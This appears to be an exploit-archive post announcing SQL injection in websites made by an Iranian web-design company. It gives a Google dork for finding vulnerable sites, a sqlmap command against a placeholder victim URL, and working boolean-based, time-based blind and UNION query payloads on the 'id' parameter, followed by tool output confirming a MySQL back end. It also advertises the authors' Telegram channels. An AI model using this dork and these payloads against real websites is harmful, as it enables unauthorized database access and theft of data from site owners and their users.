#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#- # Exploit Title: [sql Injection] # Google Dork: [inurl:php?id= intext:طراحی وب سایت : ایران تکنولوژی] # Software Link: http://sqlmap.org/ # Dork CVE: N/A # Date: [2020-05-24] # Exploit Author: [Aryan Chehreghani | Ictus_TM] # Team Channel : T.me/Ictus_TM # Version: All Version # Tested on: [Linux / Windows / ....] ______________________________________________________________________________________ SQLMAP : [-] sqlmap -u "http://victim.com/fa/user/temp.php?pavc_njol=specific&id=87 --dbs ______________________________________________________________________________________ Testing : Generic UNION query (NULL) MySQL >= 5.0.12 AND time-based blind (query SLEEP) [#] Testing Method: [+] - boolean-based blind [+] - time-based blind ______________________________________________________________________________________ ||||||||||||||||||||||| Parameter: sec (GET) || ||||||||||||||||||||||| EX Payload : --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: irantech_parvaz=specific&id=87' AND 4752=4752 AND 'qNzU'='qNzU Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: irantech_parvaz=specific&id=87' AND (SELECT 7431 FROM (SELECT(SLEEP(5)))QoYj) AND 'irYH'='irYH Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: irantech_parvaz=specific&id=-6437' UNION ALL SELECT NULL,NULL,CONCAT(0x71716b6b71,0x4c70465956435372566e62444e59784e476a416c6951684d4375484c4754566365796f4747777a79,0x71766b7071)-- - --- [05:49:06] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 ____________________________________________________________________________________ [=] T.me/Clvsornapv